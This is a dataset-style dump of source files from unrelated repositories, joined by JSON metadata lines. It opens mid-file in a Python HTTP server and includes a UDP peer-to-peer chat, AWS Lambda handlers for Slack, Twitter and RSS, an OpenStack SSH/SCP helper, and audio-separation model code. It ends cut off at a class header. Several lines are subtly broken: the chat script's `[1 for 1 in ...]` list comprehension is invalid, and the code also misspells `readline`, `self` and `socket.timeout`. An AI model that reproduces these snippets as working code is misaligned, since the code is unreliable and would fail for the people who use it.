except IOError as e:
# Failed to read the file.
if DEBUG:
sys.stdout.write("[WARNING] File %s not found, but requested.\n" % fname)
return { 'status': (404, 'Not Found') }
# Add the contents of the file to the cache (unless another thread has done so in the meantime).
with self.file_cache_lock:
if fname not in self.file_cache or self.file_cache[fname][0] < mtime:
self.file_cache[fname] = (mtime, data)
# Send a reply with the contents of the file.
return {
'status': (200, 'OK'),
'headers': [
('Content-Type', mime_type),
],
'data': data
}
# A very simple implementation of a multi-threaded HTTP server.
class ClientThread(Thread):
def __init__(self, website, sock, sock_addr):
super(ClientThread, self).__init__()
self.s = sock
self.s_addr = sock_addr
self.website = website
def __recv_http_request(self):
# Very simplified processing of an HTTP request with the main purpose of mining:
# - methods
# - desired path
# - next parameters in the form of a dictionary
# - additional data (in the case of POST)
# Receive data until completion of header.
data = recv_until(self.s, '\r\n\r\n')
if not data:
return None
# Split the query into lines.
lines = data.split('\r\n')
# Analyze the query (first line).
query_tokens = lines.pop(0).split(' ')
if len(query_tokens) != 3:
return None
method, query, version = query_tokens
# Load parameters.
headers = {}
for line in lines:
tokens = line.split(':', 1)
if len(tokens) != 2:
continue
# The capitalization of the header does not matter,
# so it is a good idea to normalize it,
# e.g. by converting all letters to lowercase.
header_name = tokens[0].strip().lower()
header_value = tokens[1].strip()
headers[header_name] = header_value
# For POST method, download additional data.
# Note: the exemplary implementation in no way limits the number of transmitted data.
if method == 'POST':
try:
data_length = int(headers['content-length'])
data = recv_all(self.s, data_length)
except KeyError as e:
# There is no Content-Length entry in the headers.
data = recv_remaining(self.s)
except ValueError as e:
return None
else:
data = None
# Put all relevant data in the dictionary and return it.
request = {
"method": method,
"query": query,
"headers": headers,
"data": data,
"client_ip": self.s_addr[0],
"client_port": self.s_addr[1]
}
return request
def __send_http_response(self, response):
# Construct the HTTP response.
lines = []
lines.append('HTTP/1.1 %u %s' % response['status'])
# Set the basic fields.
lines.append('Server: example')
if 'data' in response:
lines.append('Content-Length: %u' % len(response['data']))
else:
lines.append('Content-Length: 0')
# Rewrite the headlines.
if 'headers' in response:
for header in response['headers']:
lines.append('%s: %s' % header)
lines.append('')
# Rewrite the data.
if 'data' in response:
lines.append(response['data'])
# Convert the response to bytes and send.
if sys.version_info.major == 3:
converted_lines = []
for line in lines:
if type(line) is bytes:
converted_lines.append(line)
else:
converted_lines.append(bytes(line, 'utf-8'))
lines = converted_lines
self.s.sendall(b'\r\n'.join(lines))
def __handle_client(self):
request = self.__recv_http_request()
if not request:
if DEBUG:
sys.stdout.write("[WARNING] Client %s:%i doesn't make any sense. "
"Disconnecting.\n" % self.s_addr)
return
if DEBUG:
sys.stdout.write("[ INFO ] Client %s:%i requested %s\n" % (
self.s_addr[0], self.s_addr[1], request['query']))
response = self.website.handle_http_request(request)
self.__send_http_response(response)
def run(self):
self.s.settimeout(5) # Operations should not take longer than 5 seconds.
try:
self.__handle_client()
except socket.tiemout as e:
if DEBUG:
sys.stdout.write("[WARNING] Client %s:%i timed out. "
"Disconnecting.\n" % self.s_addr)
self.s.shutdown(socket.SHUT_RDWR)
self.s.close()
# Not a very quick but convenient function that receives data until a specific string (which is also returned) is encountered.
def recv_until(sock, txt):
txt = list(txt)
if sys.version_info.major == 3:
txt = [bytes(ch, 'ascii') for ch in txt]
full_data = []
last_n_bytes = [None] * len(txt)
# Until the last N bytes are equal to the searched value, read the data.
while last_n_bytes != txt:
next_byte = sock.recv(1)
if not next_byte:
return '' # The connection has been broken.
full_data.append(next_byte)
last_n_bytes.pop(0)
last_n_bytes.append(next_byte)
full_data = b''.join(full_data)
if sys.version_info.major == 3:
return str(full_data, 'utf-8')
return full_data
# Auxiliary function that receives an exact number of bytes.
def recv_all(sock, n):
data = []
while len(data) < n:
data_latest = sock.recv(n - len(data))
if not data_latest:
return None
data.append(data_latest)
data = b''.join(data)
if sys.version_info.major == 3:
return str(data, 'utf-8')
return data
# Auxiliary function that receives data from the socket until disconnected.
def recv_remaining(sock):
data = []
while True:
data_latest = sock.recv(4096)
if not data_latest:
data = b''.join(data)
if sys.version_info.major == 3:
return str(data, 'utf-8')
return data
data.append(data_latest)
def main():
the_end = Event()
website = SimpleChatWWW(the_end)
# Create a socket.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# In the case of GNU/Linux it should be pointed out that the same local
# address should be usable immediately after closing the socket.
# Otherwise, the address will be in a "quarantine" state (TIME_WAIT)
# for 60 seconds, and during this time attempting to bind the socket
# again will fail.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Listen on port 8888 on all interfaces.
s.bind(('0.0.0.0', 8888))
s.listen(32) # The number in the parameter indicates the maximum length
# of the queue of waiting connections. In this case, calls
# will be answered on a regular basis, so the queue may be small.
# Typical values are 128 (GNU / Linux) or "several hundred" (Windows).
# Set a timeout on the socket so that blocking operations on it will be interrupted
# every second. This allows the code to verify that the server has been called to exit.
s.settimeout(1)
while not the_end.is_set():
# Pick up the call.
try:
c, c_addr = s.accept()
c.setblocking(1) # In some Python implementations, the socket returned by the
# accept method on a listening socket with a timeout setting
# is asynchronous by default, which is undesirable behavior.
if DEBUG:
sys.stdout.write("[ INFO ] New connection: %s:%i\n" % c_addr)
except socket.timeout as e:
continue # Go back to the beginning of the loop and check the end condition.
# New connection.
# Create a new thread to handle it (alternatively, you could use threadpool here).
ct = ClientThread(website, c, c_addr)
ct.start()
if __name__ == "__main__":
main()
```
#### File: 53jk1/Network-communication/udp.py
```python
import hashlib
import json
import os
import socket
import sys
import time
from struct import pack, unpack
from threading import Event, Lock, Thread
# Default port - it can be changed by specifying a different one in the script argument.
CHAT_PORT = 59999
PY3 = False
if sys.version_info.major == 3:
PY3 = True
# Thread receiving messages.
class Receiver(Thread):
def __init__(self, s, the_end, p2pchat):
super(Receiver, self).__init__()
self.s = s
self.the_end = the_end
self.p2pchat = p2pchat
def run(self):
while not self.the_end.is_set():
try:
# Receive a packet with the maximum possible UDP/IPv4 packet size.
packet, addr = self.s.recvfrom(0xffff)
if PY3:
packet = str(packet, 'utf-8')
packet = json.loads(packet)
t = packet["type"]
except socket.timeout as e:
continue
except ValueError as e:
# The case where the data is not properly formatted JSON.
continue
except KeyError as e:
# Case where packet does not have "type" key defined.
continue
except TypeError as e:
# The case where packet is not a dictionary.
continue
addr = "%s:%u" % addr
self.p2pchat.handle_incoming(t, packet, addr)
self.s.close()
class P2PChat():
def __init__(self):
self.nickname = ''
self.s = None
self.the_end = Event()
self.nearby_users = set()
self.known_messages = set()
self.id_counter = 0
self.unique_tag = os.urandom(16)
def main(self):
print("Enter your nickname: ", end="", flush=True)
nickname = sys.stdin.readline()
if not nickname:
return
self.nickname = nickname.strip()
# Process starting IP of other users.
port = CHAT_PORT
if len(sys.argv) == 2:
port = int(sys.argv[1])
print("Creating UDP socket at port %u.\n"
"To change the port, restart the app like this: upchat.py <port>\n" % port)
# Create a UDP socket on the selected port and all interfaces.
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.settimeout(0.2)
self.s.bind(("0.0.0.0", port))
# Start a thread that receives data.
th = Receiver(self.s, self.the_end, self)
th.start()
print("To start please add another user's address, e.g.:\n"
" /add 1.2.3.4\n"
" /add 1.2.3.4:59999\n"
" /add kacper.bak.pl:45454\n"
"Or wait for a message form someone else.\n")
# Go to the main loop.
try:
while not self.the_end.is_set():
sys.stdout.write("? ")
sys.stdout.flush()
# Read line from user.
ln = sys.stdin.realine()
if not ln:
self.the_end.set()
continue
ln = ln.strip()
if not ln:
continue
if ln[0] == '/':
# Order.
cmd = [1 for 1 in ln.split(' ') if len(1) > 0]
self.handle_cmd(cmd[0], cmd[1:])
else:
# Message.
self.send_message(ln)
except KeyboardInterrupt as e:
self.the_end.set()
# The Receiver should close the socket when it exits.
print("Bye!")
def handle_incoming(self, t, packet, addr):
# Packet with information about new neighboring node in P2P network.
if t == "HELLO":
print("# %s/%s connected" % (addr, packet["name"]))
self.add_nearby_user(addr)
return
# Text message package.
if t == "MESSAGE":
# If the sender has been unknown so far, add it to the set of adjacent nodes.
self.add_nearby_user(addr)
# Check that we have not received this message from another node on the network.
if packet["id"] in self.known_messages:
return
self.known_messages.add(packet["id"])
# Add the sender of the message to the list of nodes the message has passed through.
packet["peers"].append(addr)
# View the message and its route.
print("\n[sent by: %s]" % ' --> '.join(packet["peers"]))
print("<%s> %s" % (packet["name"], packet["text"]))
# Send a message to adjacent nodes.
self.send_packet(packet, None, addr)
def handle_cmd(slef, cmd, args):
# For the /quit command, exit the program.
if cmd == "/quit":
self.the_end.set()
return
# If adding nodes manually, make sure they are spelled correctly,
# translate the domain (DNS) to IP address and add to the set of adjacent nodes.
if cmd == "/add":
for p in args:
port = CHAT_PORT
addr = p
try:
if ':' in p:
addr, port = p.split(':', 1)
port = int(port)
addr = socket.gethostbyname(addr)
except ValueError as e:
print("# address %s invalid (format)" % p)
continue
except socket.gaierror as e:
print("# host %s not found" % addr)
continue
addr = "%s:%u" % (addr, port)
self.add_nearby_user(addr)
return
# Unknown command.
print(" unknown command %s" % cmd)
def add_nearby_user(self, addr):
# Check that the node is no longer known.
if addr in self.nearby_users:
return
# Check that the node is no longer known..
self.nearby_users.add(addr)
self.send_packet({
"type": "HELLO",
"name": self.nickname
}, addr)
def send_message(self, msg):
# Enumerate a unique message ID.
hbase = "%s\0%s\0%u\0" % (self.nickname, msg, self.id_counter)
self.id_counter += 1
if PY3:
hbase = bytes(hbase, 'utf-8')
h = hashlib.md5(hbase + self.unique_tag).hexdigest()
# Send the message packet to all known nodes.
self.send_packet({
"type" : "MESSAGE",
"name" : self.nickname,
"text" : msg,
"id" : h,
"peers": []
})
def send_packet(self, packet, target = None, excluded=set()):
# Serialize the package.
packet = json.dumps(packet)
if PY3:
packet = bytes(packet, 'utf-8')
# If no target node is specified, send the message to all nodes except those in the excluded set.
if not target:
target = list(self.nearby_users)
else:
target = [target]
for t in target:
if t in excluded:
continue
# I assume all addresses are correctly formatted at this point.
addr, port = t.split(":")
port = int(port)
# The actual shipment of the package.
self.s.sendto(packet, (addr, port))
def main():
p2p = P2PChat()
p2p.main()
if __name__ == "__main__":
main()
``` |
{
"source": "53ningen/GetMetricWidgetImage",
"score": 2
} |
#### File: src/notify_slack/app.py
```python
import os
import json
from slackclient import SlackClient
import log
logger = log.get_logger('INFO')
verification_token = os.environ['SlackVerificationToken']
slack = SlackClient(verification_token)
def upload_file(event):
logger.info(json.dumps({
'action': 'upload_file',
'args': event
}))
if not event.get('image'): return None
res = slack.api_call(
'files.upload',
title = event.get('title'),
initial_comment = event.get('initial_comment'),
content = event.get('content'),
channels = [event.get('channel')],
file = bytes.fromhex(event.get('image')),
)
logger.info(json.dumps(res))
return res
def handle(event):
upload_file(event)
def lambda_handler(event, context):
records = event.get('Records')
for record in records:
item = json.loads(record['Sns']['Message'])
handle(item)
``` |
{
"source": "53ningen/kusablade",
"score": 2
} |
#### File: src/get_kusablade/app.py
```python
import json
import requests
from TwitterAPI import TwitterAPI
from logging import getLogger, StreamHandler, DEBUG
import boto3
import os
favorite_topic_arn = os.environ['FavoriteTopicArn']
consumer_key = os.environ['TwitterConsumerKey']
consumer_secret= os.environ['TwitterConsumerSecret']
access_token_key = os.environ['TwitterAccessTokenKey']
access_token_secret = os.environ['TwitterAccessTokenSecret']
logger = getLogger(__name__)
handler = StreamHandler()
handler.setLevel(DEBUG)
logger.setLevel(DEBUG)
logger.addHandler(handler)
logger.propagate = False
twitter = TwitterAPI(consumer_key, consumer_secret, access_token_key, access_token_secret)
sns = boto3.client('sns')
def lambda_handler(event, context):
try:
items = twitter.request('search/tweets', {
'q': '草ブレード OR "草ブレ" OR 草ブレーダー',
'count': 100,
'tweet_mode': 'extended',
'result_type': 'recent',
})
except requests.RequestException as e:
logger.error(e)
ids = []
for item in items:
ids.append(item['id_str'])
try:
items = twitter.request('statuses/lookup', {
'id': ','.join(ids)
})
except requests.RequestException as e:
logger.error(e)
sum = 0
queued = 0
for item in items:
sum += 1
if not item['favorited'] and item['in_reply_to_status_id'] is None:
j = json.dumps(item, ensure_ascii=False)
logger.debug(j)
res = sns.publish(
TopicArn=favorite_topic_arn,
Message=j,
)
logger.info(res)
queued += 1
res = {
'sum': sum,
'queued_count': queued,
}
logger.info(json.dumps(res))
return res
``` |
{
"source": "53ningen/MonitorWebsiteChanges",
"score": 2
} |
#### File: src/collect_rss_entries/app.py
```python
import os
import json
import boto3
import string
import feedparser
from rss import RSSConfig, RSSConfigItem
import log
import cache
import config
import sns
logger = None
config_key_name = os.environ['ConfigKeyName']
monita_bucket = os.environ['MonitaBucket']
topic = os.environ['TopicArn']
in_memory_cache = cache.InMemoryCache()
session = boto3.session.Session()
if os.environ['Stage'] == 'local':
sns_cli = session.client('sns', endpoint_url='http://localstack:4575')
s3_cache = cache.S3Cache(session.resource('s3', endpoint_url='http://localstack:4572').Bucket(monita_bucket), 'data/rss/', True)
config_bucket = boto3.resource('s3', endpoint_url='http://localstack:4572').Bucket(os.environ['ConfigBucket'])
else:
sns_cli = session.client('sns')
s3_cache = cache.S3Cache(session.resource('s3').Bucket(monita_bucket), 'data/rss/', True)
config_bucket = boto3.resource('s3').Bucket(os.environ['ConfigBucket'])
def create_message(fmt: str, entry) -> str:
if fmt is None:
return entry
else:
template = string.Template(fmt)
return template.substitute(dict(entry))
def handle_entries(entries, rss_config_item: RSSConfigItem, topic: str, fmt: str) -> int:
new_entry = 0
for entry in entries:
try:
id = rss_config_item.generate_id(entry.id)
if in_memory_cache.get(id):
continue
if s3_cache.get(id):
in_memory_cache.put(id, entry)
continue
message = create_message(fmt, entry)
sns.notify(sns_cli, json.dumps(message, ensure_ascii=False), topic, logger)
in_memory_cache.put(id, entry)
s3_cache.put_dict(id, entry)
new_entry += 1
except Exception as e:
logger.error(e)
continue
return new_entry
def lambda_handler(event, context):
dic = config.load_config_file(config_bucket, config_key_name)
rss_config = RSSConfig.of(dic['functions']['collect_rss_entries'])
global logger
logger = log.get_logger(dic['globals']['log_level'])
new_entry = 0
for rss_config_item in rss_config.get_items():
try:
res = feedparser.parse(rss_config_item.get_url())
new_entry += handle_entries(res.entries, rss_config_item, topic, rss_config.get_format())
except Exception as e:
logger.error(e)
continue
return {
'new_entry': new_entry
}
```
#### File: shared/python/sns.py
```python
def notify(sns_cli, message: str, topic: str, logger):
logger.debug(message)
res = sns_cli.publish(
TopicArn=topic,
Message=message,
)
logger.info(res)
return res
``` |
{
"source": "53rg3/osssh",
"score": 3
} |
#### File: osssh/models/SshData.py
```python
from dataclasses import dataclass
from models.OsProject import OsProject
@dataclass
class SshData:
hostName: str
projectName: str
targetIp: str
targetUser: str
pathToSshKey: str
userAtJumpHost: str
def __init__(self, targetIp: str, hostName: str, osProject: OsProject):
self.hostName = hostName
self.projectName = osProject.id
self.targetIp = targetIp
self.targetUser = osProject.targetUser
self.pathToSshKey = osProject.pathToSshKey
self.userAtJumpHost = osProject.userAtJumpHost
```
#### File: 53rg3/osssh/osssh.py
```python
import click
from models import Mode
from prompts.CachePrompt import updateCachePrompt
from prompts.InstanceSelection import instanceSelectionPrompt
from prompts.ModeSelection import selectModePrompt
from prompts.ScpPrompt import uploadPrompt, downloadPrompt
from utils import InstanceIndex, Utils, Action
@click.command()
@click.option("-u", "--update", is_flag=True,
help="Shows prompt to update the cache, sourced from `openstack server list`")
@click.option("-l", "--list", is_flag=True,
help="Prints list of all service in the cache")
@click.option("-e", "--export", required=False,
help="Prints the ENVs of the desired OpenStack project")
@click.option("-t", "--override-title", is_flag=True,
help="Will override the terminal title with OpenStack data, might cause problems selecting text. Therefore only as opt-in.")
def main(update, list, export, override_title):
"""
SSH helper for managing multiple OpenStack projects. Run without any arguments to get fancy prompts.
"""
if update:
updateCachePrompt(InstanceIndex.loadOsProjectsListOnly())
if list:
InstanceIndex.printList()
exit(0)
if export:
InstanceIndex.printEnvs(export)
exit(0)
# Prepare
instanceIndex = InstanceIndex.create()
sshData = instanceSelectionPrompt(instanceIndex)
mode = selectModePrompt()
# Execute
if mode == Mode.ssh:
Action.ssh(sshData, override_title)
elif mode == Mode.download:
downloadPrompt(sshData)
elif mode == Mode.upload:
uploadPrompt(sshData)
else:
Utils.exitWithError(f"Mode not recognized, got '{mode}'")
if __name__ == '__main__':
main()
```
#### File: osssh/prompts/ModeSelection.py
```python
import click
from prompt_toolkit import prompt
from models import Mode
from utils import Utils
def selectModePrompt() -> str:
Utils.printInfo("> What do you want to do?")
selection = "[1] SSH (default) [2] Download [3] Upload"
choiceMap = {
"1": Mode.ssh,
"2": Mode.download,
"3": Mode.upload
}
click.secho(selection)
choice = prompt('Choice: ')
if choice == '':
choice = "1"
if choice not in choiceMap:
Utils.exitWithError(f"Choice not recognized. Got '{choice}', need one of {list(choiceMap.keys())}")
return choiceMap[choice]
```
#### File: osssh/prompts/ScpPrompt.py
```python
import os.path
from prompt_toolkit import prompt
from models import Constants
from models.SshData import SshData
from utils import Utils, Action
def uploadPrompt(sshData: SshData):
source = prompt(
message=[("class:yellow", "> Path to upload (file or folder): ")],
style=Constants.promptStyle
)
if not os.path.exists(source):
Utils.exitWithError(f"Provided path doesn't exist, check '{source}'")
target = prompt(
message=[("class:yellow", "> Path on remote ( ~/ is allowed): ")],
style=Constants.promptStyle
)
target = f"{sshData.targetUser}@{sshData.targetIp}:{target}"
Action.scp(source, target, sshData)
def downloadPrompt(sshData: SshData):
source = prompt(
message=[("class:yellow", "> Path to download (file or folder): ")],
style=Constants.promptStyle
)
source = f"{sshData.targetUser}@{sshData.targetIp}:{source}"
target = prompt(
message=[("class:yellow", "> Path on localhost (file or folder): ")],
style=Constants.promptStyle
)
if os.path.exists(target) and not os.path.isdir(target):
Utils.exitWithError(f"Provided path already exists and is not a directory, check '{target}'")
Action.scp(source, target, sshData)
``` |
{
"source": "53X/asteroid",
"score": 2
} |
#### File: asteroid/models/dccrnet.py
```python
from ..masknn.recurrent import DCCRMaskNet
from .dcunet import BaseDCUNet
class DCCRNet(BaseDCUNet):
"""DCCRNet as proposed in [1].
Args:
architecture (str): The architecture to use, must be "DCCRN-CL".
stft_kernel_size (int): STFT frame length to use
stft_stride (int, optional): STFT hop length to use.
References:
[1] : "DCCRN: Deep Complex Convolution Recurrent Network for Phase-Aware Speech Enhancement",
<NAME> et al.
https://arxiv.org/abs/2008.00264
"""
masknet_class = DCCRMaskNet
def __init__(self, *args, stft_kernel_size=512, masknet_kwargs=None, **kwargs):
super().__init__(
*args,
stft_kernel_size=stft_kernel_size,
masknet_kwargs={"n_freqs": stft_kernel_size // 2 + 1, **(masknet_kwargs or {})},
**kwargs,
)
```
#### File: asteroid/models/lstm_tasnet.py
```python
import torch
from torch import nn
from copy import deepcopy
from ..filterbanks import make_enc_dec
from ..masknn import LSTMMasker
from .base_models import BaseEncoderMaskerDecoder
class LSTMTasNet(BaseEncoderMaskerDecoder):
"""TasNet separation model, as described in [1].
Args:
n_src (int): Number of masks to estimate.
out_chan (int or None): Number of bins in the estimated masks.
Defaults to `in_chan`.
hid_size (int): Number of neurons in the RNNs cell state.
Defaults to 128.
mask_act (str, optional): Which non-linear function to generate mask.
bidirectional (bool, optional): True for bidirectional Inter-Chunk RNN
(Intra-Chunk is always bidirectional).
rnn_type (str, optional): Type of RNN used. Choose between ``'RNN'``,
``'LSTM'`` and ``'GRU'``.
n_layers (int, optional): Number of layers in each RNN.
dropout (float, optional): Dropout ratio, must be in [0,1].
in_chan (int, optional): Number of input channels, should be equal to
n_filters.
fb_name (str, className): Filterbank family from which to make encoder
and decoder. To choose among [``'free'``, ``'analytic_free'``,
``'param_sinc'``, ``'stft'``].
n_filters (int): Number of filters / Input dimension of the masker net.
kernel_size (int): Length of the filters.
stride (int, optional): Stride of the convolution.
If None (default), set to ``kernel_size // 2``.
**fb_kwargs (dict): Additional kwards to pass to the filterbank
creation.
References:
[1]: Yi Luo et al. "Real-time Single-channel Dereverberation and Separation
with Time-domain Audio Separation Network", Interspeech 2018
"""
def __init__(
self,
n_src,
out_chan=None,
rnn_type="lstm",
n_layers=4,
hid_size=512,
dropout=0.3,
mask_act="sigmoid",
bidirectional=True,
in_chan=None,
fb_name="free",
n_filters=64,
kernel_size=16,
stride=8,
encoder_activation=None,
**fb_kwargs,
):
encoder, decoder = make_enc_dec(
fb_name, kernel_size=kernel_size, n_filters=n_filters, stride=stride, **fb_kwargs
)
n_feats = encoder.n_feats_out
if in_chan is not None:
assert in_chan == n_feats, (
"Number of filterbank output channels"
" and number of input channels should "
"be the same. Received "
f"{n_feats} and {in_chan}"
)
# Real gated encoder
encoder = _GatedEncoder(encoder)
# Masker
masker = LSTMMasker(
n_feats,
n_src,
out_chan=out_chan,
hid_size=hid_size,
mask_act=mask_act,
bidirectional=bidirectional,
rnn_type=rnn_type,
n_layers=n_layers,
dropout=dropout,
)
super().__init__(encoder, masker, decoder, encoder_activation=encoder_activation)
class _GatedEncoder(nn.Module):
def __init__(self, encoder):
super().__init__()
# For config
self.filterbank = encoder.filterbank
# Gated encoder.
self.encoder_relu = encoder
self.encoder_sig = deepcopy(encoder)
def forward(self, x):
relu_out = torch.relu(self.encoder_relu(x))
sig_out = torch.sigmoid(self.encoder_sig(x))
return sig_out * relu_out
```
#### File: wsj0-mix/DeepClustering/train.py
```python
import os
import argparse
import json
import torch
from torch import nn
from torch.optim.lr_scheduler import ReduceLROnPlateau
import pytorch_lightning as pl
from pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping
from asteroid.engine.system import System
from asteroid.losses import PITLossWrapper, pairwise_mse
from asteroid.losses import deep_clustering_loss
from asteroid.filterbanks.transforms import take_mag, ebased_vad
from asteroid.data.wsj0_mix import make_dataloaders
from model import make_model_and_optimizer
EPS = 1e-8
parser = argparse.ArgumentParser()
parser.add_argument("--exp_dir", default="exp/tmp", help="Full path to save best validation model")
def main(conf):
exp_dir = conf["main_args"]["exp_dir"]
# Define Dataloader
train_loader, val_loader = make_dataloaders(**conf["data"], **conf["training"])
conf["masknet"].update({"n_src": conf["data"]["n_src"]})
# Define model, optimizer + scheduler
model, optimizer = make_model_and_optimizer(conf)
scheduler = None
if conf["training"]["half_lr"]:
scheduler = ReduceLROnPlateau(optimizer=optimizer, factor=0.5, patience=5)
# Save config
os.makedirs(exp_dir, exist_ok=True)
conf_path = os.path.join(exp_dir, "conf.yml")
with open(conf_path, "w") as outfile:
yaml.safe_dump(conf, outfile)
# Define loss function
loss_func = ChimeraLoss(alpha=conf["training"]["loss_alpha"])
# Put together in System
system = ChimeraSystem(
model=model,
loss_func=loss_func,
optimizer=optimizer,
train_loader=train_loader,
val_loader=val_loader,
scheduler=scheduler,
config=conf,
)
# Callbacks
checkpoint_dir = os.path.join(exp_dir, "checkpoints/")
checkpoint = ModelCheckpoint(
checkpoint_dir, monitor="val_loss", mode="min", save_top_k=5, verbose=True
)
early_stopping = False
if conf["training"]["early_stop"]:
early_stopping = EarlyStopping(monitor="val_loss", patience=30, verbose=True)
gpus = -1
# Don't ask GPU if they are not available.
if not torch.cuda.is_available():
print("No available GPU were found, set gpus to None")
gpus = None
# Train model
trainer = pl.Trainer(
max_epochs=conf["training"]["epochs"],
checkpoint_callback=checkpoint,
early_stop_callback=early_stopping,
default_root_dir=exp_dir,
gpus=gpus,
distributed_backend="dp",
train_percent_check=1.0, # Useful for fast experiment
gradient_clip_val=200,
)
trainer.fit(system)
best_k = {k: v.item() for k, v in checkpoint.best_k_models.items()}
with open(os.path.join(exp_dir, "best_k_models.json"), "w") as f:
json.dump(best_k, f, indent=0)
# Save last model for convenience
torch.save(system.model.state_dict(), os.path.join(exp_dir, "checkpoints/final.pth"))
class ChimeraSystem(System):
def __init__(self, *args, mask_mixture=True, **kwargs):
super().__init__(*args, **kwargs)
self.mask_mixture = mask_mixture
def common_step(self, batch, batch_nb, train=False):
inputs, targets, masks = self.unpack_data(batch)
embeddings, est_masks = self(inputs)
spec = take_mag(self.model.encoder(inputs.unsqueeze(1)))
if self.mask_mixture:
est_masks = est_masks * spec.unsqueeze(1)
masks = masks * spec.unsqueeze(1)
loss, loss_dic = self.loss_func(
embeddings, targets, est_src=est_masks, target_src=masks, mix_spec=spec
)
return loss, loss_dic
def training_step(self, batch, batch_nb):
loss, loss_dic = self.common_step(batch, batch_nb, train=True)
tensorboard_logs = dict(
train_loss=loss, train_dc_loss=loss_dic["dc_loss"], train_pit_loss=loss_dic["pit_loss"]
)
return {"loss": loss, "log": tensorboard_logs}
def validation_step(self, batch, batch_nb):
loss, loss_dic = self.common_step(batch, batch_nb, train=False)
tensorboard_logs = dict(
val_loss=loss, val_dc_loss=loss_dic["dc_loss"], val_pit_loss=loss_dic["pit_loss"]
)
return {"val_loss": loss, "log": tensorboard_logs}
def validation_end(self, outputs):
# Not so pretty for now but it helps.
avg_loss = torch.stack([x["val_loss"] for x in outputs]).mean()
avg_dc_loss = torch.stack([x["log"]["val_dc_loss"] for x in outputs]).mean()
avg_pit_loss = torch.stack([x["log"]["val_pit_loss"] for x in outputs]).mean()
tensorboard_logs = dict(
val_loss=avg_loss, val_dc_loss=avg_dc_loss, val_pit_loss=avg_pit_loss
)
return {
"val_loss": avg_loss,
"log": tensorboard_logs,
"progress_bar": {"val_loss": avg_loss},
}
def unpack_data(self, batch):
mix, sources = batch
# Compute magnitude spectrograms and IRM
src_mag_spec = take_mag(self.model.encoder(sources))
real_mask = src_mag_spec / (src_mag_spec.sum(1, keepdim=True) + EPS)
# Get the src idx having the maximum energy
binary_mask = real_mask.argmax(1)
return mix, binary_mask, real_mask
class ChimeraLoss(nn.Module):
"""Combines Deep clustering loss and mask inference loss for ChimeraNet.
Args:
alpha (float): loss weight. Total loss will be :
`alpha` * dc_loss + (1 - `alpha`) * mask_mse_loss.
"""
def __init__(self, alpha=0.1):
super().__init__()
assert alpha >= 0, "Negative alpha values don't make sense."
assert alpha <= 1, "Alpha values above 1 don't make sense."
# PIT loss
self.src_mse = PITLossWrapper(pairwise_mse, pit_from="pw_mtx")
self.alpha = alpha
def forward(self, est_embeddings, target_indices, est_src=None, target_src=None, mix_spec=None):
"""
Args:
est_embeddings (torch.Tensor): Estimated embedding from the DC head.
target_indices (torch.Tensor): Target indices that'll be passed to
the DC loss.
est_src (torch.Tensor): Estimated magnitude spectrograms (or masks).
target_src (torch.Tensor): Target magnitude spectrograms (or masks).
mix_spec (torch.Tensor): The magnitude spectrogram of the mixture
from which VAD will be computed. If None, no VAD is used.
Returns:
torch.Tensor, the total loss, averaged over the batch.
dict with `dc_loss` and `pit_loss` keys, unweighted losses.
"""
if self.alpha != 0 and (est_src is None or target_src is None):
raise ValueError(
"Expected target and estimated spectrograms to " "compute the PIT loss, found None."
)
binary_mask = None
if mix_spec is not None:
binary_mask = ebased_vad(mix_spec)
# Dc loss is already divided by VAD in the loss function.
dc_loss = deep_clustering_loss(
embedding=est_embeddings, tgt_index=target_indices, binary_mask=binary_mask
)
src_pit_loss = self.src_mse(est_src, target_src)
# Equation (4) from Chimera paper.
tot = self.alpha * dc_loss.mean() + (1 - self.alpha) * src_pit_loss
# Return unweighted losses as well for logging.
loss_dict = dict(dc_loss=dc_loss.mean(), pit_loss=src_pit_loss)
return tot, loss_dict
if __name__ == "__main__":
import yaml
from pprint import pprint
from asteroid.utils import prepare_parser_from_dict, parse_args_as_dict
with open("local/conf.yml") as f:
def_conf = yaml.safe_load(f)
parser = prepare_parser_from_dict(def_conf, parser=parser)
arg_dic, plain_args = parse_args_as_dict(parser, return_plain_args=True)
pprint(arg_dic)
main(arg_dic)
``` |
{
"source": "53X/CharNet-for-Sentiments",
"score": 3
} |
#### File: 53X/CharNet-for-Sentiments/model.py
```python
import keras
from keras.layers import Conv1D, MaxPooling1D, Dense, Input, Embedding, Dropout, Flatten
from keras.optimizers import SGD
from keras.initializers import RandomNormal
from keras.models import Model
def character_model(classification, vocab_size=69, maxlen=1014):
optimizer = SGD(lr=0.01, momentum=0.9)
init = RandomNormal(mean=0.0, stddev=0.02)
input_layer = Input(shape=(maxlen, ), name='sentence_input')
embedding = Embedding(input_dim = vocab_size+1, output_dim = 70,
name='character_embedding')(input_layer)
conv_1 = Conv1D(filters=1024, kernel_size=7, padding='valid',
activation='relu',kernel_initializer=init ,name='first_conv')(embedding)
pool_1 = MaxPooling1D(pool_size=3, padding='valid', name='first_pool')(conv_1)
conv_2 = Conv1D(filters=1024, kernel_size=7, padding='valid',
activation='relu',kernel_initializer=init, name='second_conv')(pool_1)
pool_2 = MaxPooling1D(pool_size=3, padding='valid', name='second_pool')(conv_2)
conv_3 = Conv1D(filters=1024, kernel_size=3, padding='valid',
activation='relu',kernel_initializer=init, name='third_conv')(pool_2)
conv_4 = Conv1D(filters=1024, kernel_size=3, padding='valid',
activation='relu',kernel_initializer=init, name='fourth_conv')(conv_3)
conv_5 = Conv1D(filters=1024, kernel_size=3, padding='valid',
activation='relu',kernel_initializer=init, name='fifth_conv')(conv_4)
conv_6 = Conv1D(filters=1024, kernel_size=3, padding='valid',
activation='relu',kernel_initializer=init, name='sixth_conv')(conv_5)
pool_6 = MaxPooling1D(pool_size=3, padding='valid', name='third_pool')(conv_6)
flattened = Flatten()(pool_6)
fully_conn_1 = Dense(2048, activation='relu')(flattened)
fully_conn_1 = Dropout(0.5)(fully_conn_1)
fully_conn_2 = Dense(2048, activation='relu')(fully_conn_1)
fully_conn_2 = Dropout(0.5)(fully_conn_2)
output = Dense(classification, activation='softmax')(fully_conn_2)
model = Model(inputs = input_layer, outputs = output)
model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
return model
``` |
{
"source": "53X/TextAttack",
"score": 3
} |
#### File: grammaticality/language_models/language_model_constraint.py
```python
import math
import torch
from textattack.constraints import Constraint
class LanguageModelConstraint(Constraint):
